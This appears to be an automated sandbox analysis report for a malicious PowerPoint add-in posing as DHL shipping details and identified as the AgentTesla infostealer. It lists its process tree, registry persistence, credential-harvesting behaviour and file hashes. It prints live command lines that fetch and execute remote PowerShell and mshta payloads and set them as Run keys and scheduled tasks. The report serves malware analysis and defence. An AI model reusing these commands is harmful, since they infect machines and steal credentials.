Analysis
- max time kernel: 111s
- max time network: 125s
- platform: windows10_x64
- resource: win10-en-20210920
- submitted: 19-10-2021 06:05

Static task: static1
Behavioral task: behavioral1
  Sample: DHL Consignment Details.ppam
  Resource: win7-en-20210920
Behavioral task: behavioral2
  Sample: DHL Consignment Details.ppam
  Resource: win10-en-20210920
General
- Target: DHL Consignment Details.ppam
- Size: 8KB
- MD5: e49c885d3236afa32adef83e8a201573
- SHA1: f8e63da458adee3ece85529ddeba477a07087430
- SHA256: 6f931b139cdf0652432a133e3beef1ff6136571c8d953f3eee28316bbf9c5674
- SHA512: 7339c4c43193686e737c6c4dbfcaf7778195e2c51d057436426651c1a62375196f393b69e6abcffa1ca2fc75c4117fb719b5b51b3eb4bd4335c85a8d08f0e3ff
Malware Config
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes (description | pid | pid_target | process | target process):
    Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 3904 | 1844 | mshta.exe | POWERPNT.EXE
- AgentTesla Payload (3 IoCs)
  Processes (resource | yara_rule):
    behavioral2/memory/1612-322-0x000000000043751E-mapping.dmp | family_agenttesla
    behavioral2/memory/3832-390-0x000000000043751E-mapping.dmp | family_agenttesla
    behavioral2/memory/3832-396-0x00000000054D0000-0x00000000059CE000-memory.dmp | family_agenttesla
- Blocklisted process makes network request (11 IoCs)
  Processes (flow | pid | process):
    34 | 3904 | mshta.exe
    37 | 3904 | mshta.exe
    39 | 3904 | mshta.exe
    42 | 3904 | mshta.exe
    44 | 3904 | mshta.exe
    46 | 3904 | mshta.exe
    47 | 3904 | mshta.exe
    49 | 3904 | mshta.exe
    51 | 3904 | mshta.exe
    52 | 3904 | mshta.exe
    54 | 1564 | powershell.exe
- Drops file in Drivers directory (2 IoCs)
  Processes (description | ioc | process):
    File opened for modification | C:\Windows\system32\drivers\etc\hosts | jsc.exe
    File opened for modification | C:\Windows\system32\drivers\etc\hosts | RegAsm.exe
- Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk where infostealers will often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses Microsoft Outlook profiles (1 TTP, 6 IoCs)
  Processes (description | ioc | process):
    Key opened | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegAsm.exe
    Key opened | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | jsc.exe
    Key opened | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | jsc.exe
    Key opened | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | jsc.exe
    Key opened | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegAsm.exe
    Key opened | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegAsm.exe
- Adds Run key to start application (2 TTPs, 5 IoCs)
  Processes (description | ioc | process):
    Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run | mshta.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%[email protected]/p/12.html\"" | mshta.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%[email protected]/p/12.html\"" | mshta.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%[email protected]/p/12.html\"" | mshta.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_e7293c57732f4f278d939202241e0b25.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_cf83a79c40724f5c8e18bb53de0f0399.txt').GetResponse().GetResponseStream()).ReadToend());" | mshta.exe
- Suspicious use of SetThreadContext (2 IoCs)
  Processes (description | pid | process | target process):
    PID 1564 set thread context of 1612 | 1564 | powershell.exe | jsc.exe
    PID 1564 set thread context of 3832 | 1564 | powershell.exe | RegAsm.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes (description | ioc | process):
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | POWERPNT.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | POWERPNT.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | POWERPNT.EXE
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes (description | ioc | process):
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | POWERPNT.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | POWERPNT.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | POWERPNT.EXE
- Kills process with taskkill (2 IoCs)
  Processes (pid | process):
    3784 | taskkill.exe
    2112 | taskkill.exe
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes (pid | process):
    1844 | POWERPNT.EXE
- Suspicious behavior: EnumeratesProcesses (11 IoCs)
  Processes (pid | process), identical rows collapsed with a count:
    992 | dw20.exe (x2)
    1564 | powershell.exe (x5)
    1612 | jsc.exe (x2)
    3832 | RegAsm.exe (x2)
- Suspicious behavior: SetClipboardViewer (1 IoC)
  Processes (pid | process):
    3832 | RegAsm.exe
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes (description | pid | process):
    Token: SeDebugPrivilege | 3784 | taskkill.exe
    Token: SeDebugPrivilege | 2112 | taskkill.exe
    Token: SeDebugPrivilege | 1564 | powershell.exe
    Token: SeDebugPrivilege | 1612 | jsc.exe
    Token: SeDebugPrivilege | 3832 | RegAsm.exe
- Suspicious use of FindShellTrayWindow (1 IoC)
  Processes (pid | process):
    1844 | POWERPNT.EXE
- Suspicious use of SetWindowsHookEx (5 IoCs)
  Processes (pid | process), identical rows collapsed with a count:
    1844 | POWERPNT.EXE (x3)
    1612 | jsc.exe
    3832 | RegAsm.exe
- Suspicious use of WriteProcessMemory (35 IoCs)
  Processes (description | pid | process | target process), identical rows collapsed with a count:
    PID 1844 wrote to memory of 3904 | 1844 | POWERPNT.EXE | mshta.exe (x2)
    PID 3904 wrote to memory of 3784 | 3904 | mshta.exe | taskkill.exe (x2)
    PID 3904 wrote to memory of 2112 | 3904 | mshta.exe | taskkill.exe (x2)
    PID 3904 wrote to memory of 2692 | 3904 | mshta.exe | schtasks.exe (x2)
    PID 3904 wrote to memory of 1564 | 3904 | mshta.exe | powershell.exe (x2)
    PID 3904 wrote to memory of 992 | 3904 | mshta.exe | dw20.exe (x2)
    PID 1564 wrote to memory of 2292 | 1564 | powershell.exe | jsc.exe (x3)
    PID 1564 wrote to memory of 1612 | 1564 | powershell.exe | jsc.exe (x8)
    PID 1564 wrote to memory of 1352 | 1564 | powershell.exe | csc.exe (x2)
    PID 1352 wrote to memory of 2856 | 1352 | csc.exe | cvtres.exe (x2)
    PID 1564 wrote to memory of 3832 | 1564 | powershell.exe | RegAsm.exe (x8)
- outlook_office_path (1 IoC)
  Processes (description | ioc | process):
    Key opened | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegAsm.exe
- outlook_win_path (1 IoC)
  Processes (description | ioc | process):
    Key opened | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegAsm.exe
Processes (process tree, indented by depth)
- C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\DHL Consignment Details.ppam" /ou ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" https://www.bitly.com/ajdwwdwdwdmlrufhjwijjd
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\taskkill.exe
      Command line: "C:\Windows\System32\taskkill.exe" /f /im winword.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\taskkill.exe
      Command line: "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_e7293c57732f4f278d939202241e0b25.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_cf83a79c40724f5c8e18bb53de0f0399.txt').GetResponse().GetResponseStream()).ReadToend());
      - Blocklisted process makes network request
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
        - Drops file in Drivers directory
        - Accesses Microsoft Outlook profiles
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tj0xmbt4\tj0xmbt4.cmdline"
        - Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE9D4.tmp" "c:\Users\Admin\AppData\Local\Temp\tj0xmbt4\CSC6A455C18B864498D83A45AECC44FA67B.TMP"
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        - Drops file in Drivers directory
        - Accesses Microsoft Outlook profiles
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: SetClipboardViewer
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
        - outlook_office_path
        - outlook_win_path
    - C:\Windows\System32\schtasks.exe
      Command line: "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/12.html\""
      - Creates scheduled task(s)
    - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
      Command line: dw20.exe -x -s 2708
      - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\RESE9D4.tmp
  MD5: 5c0ab55e200962088c5f46b2a9b8c7b6
  SHA1: 775538ecbdf06cf3df25e02e90176c7630feb331
  SHA256: 6a195a29c5e44a0c369bcb68c4439c65e4641dcd3207df1e8bd2e1521efea0bd
  SHA512: 1654dd1268543013181b0658871fd4de13eb4fcd7c8141c473cbe97bba00e914c33033d225dc8b8f1b596efd8b5dbb872fb3ae6a3456144134b4eb9df13d9fca
- C:\Users\Admin\AppData\Local\Temp\tj0xmbt4\tj0xmbt4.dll
  MD5: 84b21bef1f0eaa8ef419f7fd29b95991
  SHA1: 526ca3d99c9577be0566408645f798a601d0773c
  SHA256: 08d50541a45d8705e4ce668f0d4581e5ddbd78dd74634b4dc31e74d10f8fb360
  SHA512: 7ec28a6834b91ad115097fd5b7ac222ba25682883f26b376449c52700eb18bcf99f4158e0cf4410c86bef662847a05d4ec464e0a400bf0609673db5260172c47
- C:\Windows\system32\drivers\etc\hosts
  MD5: 5b2d17233558878a82ee464d04f58b59
  SHA1: 47ebffcad0b4c358df0d6a06ef335cb6aab0ab20
  SHA256: 5b036588bb4cad3de01dd04988af705da135d9f394755080cf9941444c09a542
  SHA512: d2aec9779eb8803514213a8e396b2f7c0b4a6f57de1ee84e9db0343ee5ff093e26bb70e0737a6681e21e88898ef5139969ff0b4b700cb6727979bd898fdbc85b
- \??\c:\Users\Admin\AppData\Local\Temp\tj0xmbt4\CSC6A455C18B864498D83A45AECC44FA67B.TMP
  MD5: 57733ef912bb130d08e425db233b479b
  SHA1: 34034a542a37118785c9cf076e60d7350475b01a
  SHA256: 0975a45dd14354e5aafe0646bc521141f66d3f3691d0736ff541e0a0967e50f1
  SHA512: b7587345487ae4a6555050f5ef054df6d5d79b2493a332078392632f9f68448a0c32cc184af03101bb9d1a45c1740a27d20ec5978099008d973a3dfd8e3d16fe
- \??\c:\Users\Admin\AppData\Local\Temp\tj0xmbt4\tj0xmbt4.0.cs
  MD5: e03b1e7ba7f1a53a7e10c0fd9049f437
  SHA1: 3bb851a42717eeb588eb7deadfcd04c571c15f41
  SHA256: 3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427
  SHA512: a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f
- \??\c:\Users\Admin\AppData\Local\Temp\tj0xmbt4\tj0xmbt4.cmdline
  MD5: 5286688547aeb5b1a5efc76a85af07fa
  SHA1: 065b6d02946d979bd186abf5b266cd38f1e271b0
  SHA256: 31b42e2de2a5e9a2f7a7d255b9ce603ac7a50bddee4332a68b6c7e643970078e
  SHA512: dfd2e101f6ffee2975c40d2e093722c06536093d131917a0e4b60000a1f2bb9c3a66ed25e483c83808274fc72210860bbe9fcac87c4f375f8ec56ee89fe525d7

Memory dumps (filesize in parentheses where reported)
- memory/992-298-0x0000000000000000-mapping.dmp
- memory/1352-381-0x0000000000000000-mapping.dmp
- memory/1564-312-0x0000022044253000-0x0000022044255000-memory.dmp (8KB)
- memory/1564-311-0x0000022044250000-0x0000022044252000-memory.dmp (8KB)
- memory/1564-297-0x0000000000000000-mapping.dmp
- memory/1564-317-0x0000022044256000-0x0000022044258000-memory.dmp (8KB)
- memory/1612-405-0x0000000005821000-0x0000000005822000-memory.dmp (4KB)
- memory/1612-380-0x0000000005820000-0x0000000005821000-memory.dmp (4KB)
- memory/1612-322-0x000000000043751E-mapping.dmp
- memory/1844-246-0x000001FC6B840000-0x000001FC6B844000-memory.dmp (16KB)
- memory/1844-119-0x000001FC5C160000-0x000001FC5C162000-memory.dmp (8KB)
- memory/1844-116-0x00007FFB51F30000-0x00007FFB51F40000-memory.dmp (64KB)
- memory/1844-117-0x00007FFB51F30000-0x00007FFB51F40000-memory.dmp (64KB)
- memory/1844-118-0x00007FFB51F30000-0x00007FFB51F40000-memory.dmp (64KB)
- memory/1844-127-0x00007FFB51F30000-0x00007FFB51F40000-memory.dmp (64KB)
- memory/1844-121-0x000001FC5C160000-0x000001FC5C162000-memory.dmp (8KB)
- memory/1844-120-0x000001FC5C160000-0x000001FC5C162000-memory.dmp (8KB)
- memory/1844-115-0x00007FFB51F30000-0x00007FFB51F40000-memory.dmp (64KB)
- memory/2112-295-0x0000000000000000-mapping.dmp
- memory/2692-296-0x0000000000000000-mapping.dmp
- memory/2856-384-0x0000000000000000-mapping.dmp
- memory/3784-294-0x0000000000000000-mapping.dmp
- memory/3832-390-0x000000000043751E-mapping.dmp
- memory/3832-396-0x00000000054D0000-0x00000000059CE000-memory.dmp (5.0MB)
- memory/3832-407-0x00000000054D0000-0x00000000059CE000-memory.dmp (5.0MB)
- memory/3904-261-0x0000000000000000-mapping.dmp